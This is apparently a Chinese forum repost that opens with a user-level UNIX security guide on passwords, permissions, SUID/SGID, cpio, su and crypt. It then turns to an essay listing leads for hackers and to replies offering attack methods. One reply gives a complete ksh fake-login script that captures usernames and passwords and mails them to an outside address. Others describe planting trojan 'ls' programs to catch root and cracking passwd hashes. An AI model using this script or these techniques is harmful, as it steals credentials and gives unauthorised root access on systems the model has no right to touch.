UNIX系统安全[转贴]
本文从用户角度讨论UNIX系统安全,阐述口令,文件保护,目录保护, 与用户程序有关的某些特殊特性和使用crypt命令加密,并给出一些重要的安全忠告,以帮助用户保护自己的户头安全。1.口令安全
UNIX系统中的/etc/passwd文件含有全部系统需要知道的关于每个用户的信息(加密后的口令也可能存于/etc/shadow文件中).
/etc/passwd中包含有用户的登录名,经过加密的口令,用户号,用户组号,
用户注释,用户主目录和用户所用的shell程序。 其中用户号(UID)和用户组号(GID)用于UNIX系统唯一地标识用户和同组用户及用户的访问权限。
/etc/passwd中存放的加密的口令用于用户登录时输入的口令经计算后相比较,符合则允许登录,否则拒绝用户登录。 用户可用passwd命令修改自己的口令不能直接修改/etc/passwd中的口令部份。
一个好的口令应当至少有6个字符长,不要取用个人信息(如生日,名字,反向拼写的登录名,房间中可见的东西), 普通的英语单词也不好(因为可用字典攻击法),口令中最好有一些非字母(如数字,标点符号,控制字符等),还要好记一些,不能写在纸上或计算机中的文件中, 选择口令的一个好方法是将两个不相关的词用一个数字或控制字符相连,并截断为8个字符.当然,如果你能记住8位乱码自然更好.
不应使用同一个口令在不同机器中使用, 特别是在不同级别的用户上使用同
一口令,会引起全盘崩溃.用户应定期改变口令,至少6个月要改变一次,系统管理员可以强制用户定期做口令修改.
为防止眼明手快的人窃取口令,在输入口令时应确认无人在身边.
0 2.文件许可权
文件属性决定了文件的被访问权限,即谁能存取或执行该文件。 用ls -l可以
列出详细的文件信息,如:
-rwxrwxrwx 1 pat cs440 70 Jul 28 21:12 zombin
包括了文件许可,文件联结数,文件所有者名,文件相关组名,文件长度,上次存取日期和文件名.
其中文件许可分为四部分:
-:表示文件类型.
第一个rwx:表示文件属主的访问权限.
第二个rwx:表示文件同组用户的访问权限.
第三个rwx:表示其他用户的访问权限.
若某种许可被限制则相应的字母换为-.
在许可权限的执行许可位置上, 可能是其它字母,s,S,t,T.s和 S可出现在所
有者和同组用户许可模式位置上, 与特殊的许可有关,后面将要讨论, t和T可出现在其他用户的许可模式位置上,与"粘贴位"有关而与安全无关。小写字母(x,s,t)
表示执行许可为允许,负号或大写字母(-,S或T)表示执行许可为不允许.
改变许可方式可使用chmod命令,并以新许可方式和该文件名为参数.新许可方式以3位8进制数给出,r为4,w为2,x为1.如rwxr-xr--为754.
chmod也有其它方式的参数可直接对某组参数修改,在此不再多说,详见UNIX
系统的联机手册。
文件许可权可用于防止偶然性地重写或删除一个重要文件(即使是属主自己)!
改变文件的属主和组名可用chown和chgrp,但修改后原属主和组员就无法修改回来了。
3.目录许可
在UNIX系统中,目录也是一个文件,用ls -l列出时, 目录文件的属性前面带一个d,目录许可也类似于文件许可,用ls列目录要有读许可, 在目录中增删文件
要有写许可,进入目录或将该目录作路径分量时要有执行许可, 故要使用任一个文件,必须有该文件及找到该文件的路径上所有目录分量的相应许可 .仅当要打开一个文件时,文件的许可才开始起作用,而rm,mv只要有目录的搜索和写许可,不需文件的许可,这一点应注意.
4.umask命令
umask设置用户文件和目录的文件创建缺省屏蔽值,若将此命令放入.profile文件,就可控制该用户后续所建文件的存取许可.umask命令与chmod命令的作用正好相反,它告诉系统在创建文件时不给予什么存取许可.
5.设置用户ID和同组用户ID许可用户ID许可(SUID)设置和同组用户ID许可(SGID)可给予可执行的目标文件(只有可执行文件才有意义) 当一个进程执行时就被赋于4个编号,以标识该进程隶属于谁,分别为实际和有效的UID,实际和有效的GID.有效的UID和GID一般和实际的UID和 GID相同,有效的UID和GID用于系统确定该进程对于文件的存取许可.而设置可执行文件的SUID许可将改变上述情况,当设置了SUID时,进程的有效UID为该可执行文件的所有者的有效UID,而不是执行该程序的用户的有效UID,因此,由该程序创建的都有与该程序所有者相同的存取许可. 这样,程序的所有者将可通过程序的控制在有限的范围内向用户发表不允许被公众访问的信息.同样,SGID是设置有效GID.用chmod u+s 文件名和 chmod u-s文件名来设置和取消SUID设置. 用chmod g+s 文件名和chmod g-s文件名来设置和取消SGID设置当文件设置了 SUID和SGID后chown和chgrp命令将全部取消这些许可.
6.cp mv ln和cpio命令
cp拷贝文件时,若目的文件不存在则将同时拷贝源文件的存取许可, 包括SUID
和SGID许可.新拷贝的文件属拷贝的用户所有,故拷贝另人的文件时应小心,不要被其他用户的SUID程序破坏自己的文件安全. mv移文件时,新移的文件存取许可与原文件相同,mv仅改变文件名.只要用户有目录的写和搜索许可,就可移走该目录中某人的SUID程序且不改变其存取许可. 若目录许可设置不正确,则用户的SUID程序可被移到一个他不能修改和删除的目录中, 将出现安全漏洞.
ln为现有文件建立一个链,即建立一个引用同一文件的新名字. 如目的文件已经存在,则该文件被删除而代之以新的链,或存在的目的文件不允许用户写它,
则请求用户确认是否删除该文件,只允许在同一文件系统内建链.若要删除一个SUID文件,就要确认文件的链接数,只有一个链才能确保该文件被删除.若 SUID文件已有多个链,一种方法是改变其存取许可方式, 将同时修改所有链的存取许可,也可以chmod 000 文件名,不仅取消了文件的SUID和 SGID许可,而且也取消了文件的全部链.要想找到谁与自己的SUID程序建立了链,不要立刻删除该程序,系统管理员可用ncheck命令找到该程序的其它链. cpio命令用于将目录结构拷贝到一个普通文件中,而后可再用cpio命令将该普通文件转成目录结构.用-i选项时,cpio从标准输入设备读文件和目录名表,并将其内容按档案格式拷贝到标准输出设备,使用-o选项时, cpio从标准输入设备读取先已建好的档案,重建目录结构.cpio命令常用以下命令做一完整的目录系统档案:
find fromdir -print|cpio -o > archive
根据档案文件重建一个目录结构命令为:
cpio -id < archive
cpio的安全约定如下:
(1)档案文件存放每个文件的信息,包括文件所有者,小组用户, 最后修改时间最后存取时间,文件存取许可方式.
*根据档案建立的文件保持存放于档案中的存取许可方式.
*从档案中提取的每个文件的所有者和小组用户设置给运行 cpio -i命令的用户,而不是设置给档案中指出的所有者和小组用户.
*当运行cpio -i命令的用户是root时,被建立的文件的所有者和小组用户是档案文件所指出的.
*档案中的SUID/SGID文件被重建时,保持SUID和SGID许可, 如果重建文件的用户不是root,SUID/SGID许可是档案文件指出的用户/小组的许可.
(2)现存文件与cpio档案中的文件同名时,若现存文件比档案中的文件更新,这些文件将不被重写.
(3)如果用修改选项U,则同名的现存的文件将被重写. 可能会发生一件很奇怪的事:如被重写的文件原与另一个文件建了链,文件被重写后链并不断开,换言之,该文件的链将保持,因此,该文件的所有链实际指向从档案中提取出来的文件,运行cpio无条件地重写现存文件以及改变链的指向.
(4)cpio档案中可含的全路径名或父目录名给出的文件.
7.su和newgrp命令
(1)su命令:可不必注销户头而将另一用户又登录进入系统,作为另一用户工作它将启动一新的shell并将有效和实际的UID和GID设置给另一用户. 因此必须严格将root口令保密.
(2)newgrp命令:与su相似,用于修改当前所处的组名.
8.文件加密
crypt命令可提供给用户以加密文件, 使用一个关键词将标准输入的信息编码为不可读的杂乱字符串,送到标准输出设备.再次使用此命令,用同一关键词作
用于加密后的文件,可恢复文件内容. 一般来说,在文件加密后,应删除原始文件,只留下加密后的版本,且不能忘记加密关键词.在vi中一般都有加密功能用 vi -x命令可编辑加密后的文件. 关于加密关键词的选取规则与口令的选取规则相同. 由于crypt程序可能被做成特洛依木马,故不宜用口令做为关键词.最好在加密前用pack或compress命令对文件进行压缩后再加密.
9.其它安全问题
(1)用户的.profile文件
由于用户的HOME目录下的.profile文件在用户登录时就被执行.若该文件对其他人是可写的 则系统的任何用户都能修改此文件,使其按自己的要求工作.这样可能使得其他用户具有该用户相同的权限.
(2)ls -a
此命令用于列出当前目录中的全部文件,包括文件名以.开头的文件,查看所有文件的存取许可方式和文件所有者,任何不属于自己但存在于自己的目录中的文件都应怀疑和追究.
(3).exrc文件
为编辑程序的初始化文件,使用编辑文件后,首先查找$HOME/.exrc文件和./.exrc文件,若该文件是在$HOME目录中找到, 则可像.profile一样控制它的存取方式,若在一个自己不能控制的目录中,运行编辑程序,则可能运行其他人的.exrc文件, 或许该.exrc文件存在那里正是为了损害他人的文件安全.为了保证所编辑文件的安全,最好不要在不属于自己或其他人可写的目录中运行任何编辑程序.
(4)暂存文件和目录
在UNIX系统中暂存目录为/tmp和/usr/tmp,对于程序员和许多系统命令都使用它们,如果用这些目录存放暂存文件,别的用户可能会破坏这些文件.使用暂存文件最好将文件屏蔽值定义为007, 但最保险的方法是建立自己的暂存文件和目录:$HOME/tmp,不要将重要文件存放于公共的暂存目录.
(5)UUCP和其它网络
UUCP命令用于将文件从一个UNIX系统传送到另一个UNIX系统,通过UUCP传送的文件通常存于/usr/spool/uucppublic/login目录,login是用户的登入目录.
当你为用户精心设计了一系列安全措施后,用户总会觉着有点“玄”。他凭什么为这样的网络就是“安全”的呢?是根据设计方案的厚度?还是他为此所花的钱数?到底如何评价一个网络的安全性呢?曾听说过这样的定义:“网络的安全程度定义为该网络被攻击成功的可能性”,听起来倒是蛮有哲理味儿的,可如何实际操作呢?计算机系统的安全程度可以用“橘皮书”的定义来评价,网络系统是不是也可以搞出个“橘皮书”什么的呢?
当你左一层右一层地对信息加密时,心里也许认为层数越多就越安全。但事实是不是真的这样呢?当你又加了一层密时,到底增加了多少的安全性呢?
“喏,你看....”,你指着自己的设计对用户说“即使有人突破了第一道防线,我们还有第二道防线呢。即使第二道也被突破,我们仍然有第三道、第四....”。可怜的用户望着得意洋洋的你,心里不禁嘀咕:“干嘛搞这么复杂....真的非这样不可吗?我可是只是想保证两个星期的安全性啊。”
为了防止大灰狼进来,小猪们把门窗都横七竖八地钉了个死死的。可是大灰狼会不会从别处进来呢?比如说....壁炉的烟囱!聪明的小猪们在壁炉里烧起了一锅开水....。小猪们是聪明的,我们的系统管理员们呢?
计算机系统的安全性依靠一种“访问控制模型”来进行。有没有可能建立一个“网络安全模型”并对它进行形式化的证明,以便从理论上深入开展网络安全的研究?这样就可以摆脱目前的被动地“打补丁”的做法。
网络入侵和网络安全是一对矛盾,没有Hacker高手就不会有好的安全系统。这听起来有些悲哀,可惜是事实。为了提高我们的安全防范能力,我看是不是先培养一批Hacker出来(中国的Hacker太少了)。在此提供几条线索供Hacker们参考:
用过Solaris的snoop命令吗? 用它可以“听到”同一共享网段内的其他用户的口令(当然包括超级用户的)。
sendmail 5.5.9版本以前有个debug命令, 是个强有力的远程调试工具,可惜也是一个大bug。
冒充路由器可以看到所有往来的信息,RIP协议没有身份认证的部分,虽然OSPF协议中有关于身份认证的部分,但很少有人用到。
NFS、NIS都是不太安全的。
1988年的WORM网络病毒最厉害的地方并不是传说中的利用 sendmail的缺陷,而是对看来毫无破绽的finger的攻击!
很多系统管理员为了关机方便而设立了halt之类的特殊用户, 怎样利用这一点来攻击呢?
侵入了一个系统之后,如何“打扫战场”让管理员看不出来? 如何潜伏下来以致于管理员除了重新安装系统,别无清除的办法呢?
....
这些东西都不是我凭空想象的,国外的Hacker们就是这么做的(他们还有很多更厉害的招数呢)。很多东西我也不知道该怎么做,Hacker们自己努力吧。
1-----
: 1).用过Solaris的snoop命令吗? 用它可以“听到”同一共享网段内的其他用户: 的口令(当然包括超级用户的)。
: 3).冒充路由器可以看到所有往来的信息,RIP协议没有身份认证的部分,虽然: OSPF协议中有关于身份认证的部分,但很少有人用到。
这两个是取得口令的最简洁之法, 呵呵. ------- 我也有一简洁之法:
把下面的shell 命令用 ksh 运行
clear
stty ignbrk
echo "login:\c"
read logname
stty -echo
echo "password:\c"
read passwd
print "\nLogin incorrect\n"
print $logname $passwd | mail cxterm.bbs@jet.ncic.ac.cn
stty 0
stty echo
exit
-----
嗯,是一种方法,但必须你能访问对方的机器才能偷到口令。常用的方法
还有在自己能用的目录里放上叫 "ls" "grep" 之类的程序, 希望 root能不小心运行到她们, 一旦获得 root 权限, 呵呵, 下面的我就不用说了. 所以 root 的PATH里不应当有 . (当前目录).
更彻底的方法就是根据passwd文件里面的密文算口令的明文, 我曾经编过
一个算passwd的程序, 能在 Pentium 100机器上用半个小时左右的时间算出长度<=5 && 只包含字母和数字 的口令. 因此选口令的时候要注意. 用jack14既可,攻击得当的话6位不含大写字母的pass也能在一月内破掉。
这一方法要求必须取得对方含有密文的passwd文件(有shadow passwd的机器上需要取得/etc/shadow), 所以要注意机器上passwd的安全性 (不要试图取消用户对该文件的读权限, 所有的用户都需要能读该文件).
-----
解决的办法, 可以用firewall屏蔽网段。
也可以使用SSL(secure socket layber)替代原有的socket明文数据传输。
-----
: 若干机器上都是用户可以直接su halt, 然后就成为超级用户了,
: 有的机器你可以用rlogin hostname -l halt 对方的机器就被shutdown了,: 哈哈.
我用su halt 然后就shutdown了. 有n个文件没有存盘. 继续
页:
[1]